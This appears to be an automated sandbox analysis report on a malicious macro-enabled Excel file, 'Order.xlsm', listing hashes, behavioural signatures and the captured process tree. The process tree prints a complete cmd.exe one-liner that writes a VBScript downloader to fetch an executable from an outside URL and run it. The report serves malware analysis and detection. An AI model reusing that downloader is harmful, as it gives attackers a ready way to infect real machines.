Analysis
-
max time kernel
103s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 03:50
Static task
static1
Behavioral task
behavioral1
Sample
Order.xlsm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
Order.xlsm
Resource
win10v2004-20220414-en
General
-
Target
Order.xlsm
-
Size
143KB
-
MD5
5628587a1bc8cc65ef2d1c7283319eaf
-
SHA1
2aea79b0b48861b2edbebe7180d7b5506f951d56
-
SHA256
74f28a4dad71ce2a455d4ad77fe50105b72b2357c2f34cd96b877498b35838cb
-
SHA512
6e7da7bf9514c57d369629d5ba826a77b4caacca0a9ad8c981ecedabab34a63df19d973ec665205b74dd60c1831feacffaf3a28f78faa8af444aae6acc8a3d86
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 3420 1620 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
cscript.exeflow pid process 17 3404 cscript.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1620 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE 1620 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 1620 wrote to memory of 3420 1620 EXCEL.EXE cmd.exe PID 1620 wrote to memory of 3420 1620 EXCEL.EXE cmd.exe PID 3420 wrote to memory of 3404 3420 cmd.exe cscript.exe PID 3420 wrote to memory of 3404 3420 cmd.exe cscript.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Order.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @echo strFileURL = "https://manikmeyah.net/wp-content/themes/ft/rUCCfunGgRj9MjR.exe">>C:\ProgramData\poc.vbs&@echo strHDLocation = (WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\"+"Filename.exe")>>C:\ProgramData\poc.vbs&@echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")>>C:\ProgramData\poc.vbs&@echo objXMLHTTP.open "GET", strFileURL, false>>C:\ProgramData\poc.vbs&@echo objXMLHTTP.send()>>C:\ProgramData\poc.vbs&@echo If objXMLHTTP.Status = 200 Then>>C:\ProgramData\poc.vbs&@echo Set objADOStream = CreateObject("ADODB.Stream")>>C:\ProgramData\poc.vbs&@echo objADOStream.Open>>C:\ProgramData\poc.vbs&@echo objADOStream.Type = 1 >>C:\ProgramData\poc.vbs&@echo objADOStream.Write objXMLHTTP.ResponseBody>>C:\ProgramData\poc.vbs&@echo objADOStream.Position = 0 >>C:\ProgramData\poc.vbs&@echo objADOStream.SaveToFile strHDLocation>>C:\ProgramData\poc.vbs&@echo objADOStream.Close>>C:\ProgramData\poc.vbs&@echo Set objADOStream = Nothing>>C:\ProgramData\poc.vbs&@echo End If>>C:\ProgramData\poc.vbs&@echo Set objXMLHTTP = Nothing>>C:\ProgramData\poc.vbs&@echo Set objShell = CreateObject("WScript.Shell")>>C:\ProgramData\poc.vbs&@echo objShell.Run((WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\"+"Filename.exe"))>>C:\ProgramData\poc.vbs&cscript.exe C:\ProgramData\poc.vbs2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cscript.execscript.exe C:\ProgramData\poc.vbs3⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\poc.vbsFilesize
770B
MD527d0a5ee83c1fe7339c77805c61707c5
SHA1a35c12916925f4b32a82aae22c9d6b47dcdc35f7
SHA2560df89e453952e0a34ab493b30c89f3d1e8ed01c779e5f5c23eb925c32c6f29b8
SHA5122bdddf036af567c8669ec9d2b1bee9a852dc6378df71c926188d4b5ae1b7faf04871164f68e87a0838a2e0a468754cc5e098f431847c2c6e50aa4d112e16ddb2
-
memory/1620-133-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/1620-132-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/1620-130-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/1620-134-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/1620-135-0x00007FF895D30000-0x00007FF895D40000-memory.dmpFilesize
64KB
-
memory/1620-136-0x00007FF895D30000-0x00007FF895D40000-memory.dmpFilesize
64KB
-
memory/1620-131-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/1620-141-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/1620-142-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/1620-143-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/1620-144-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmpFilesize
64KB
-
memory/3404-138-0x0000000000000000-mapping.dmp
-
memory/3420-137-0x0000000000000000-mapping.dmp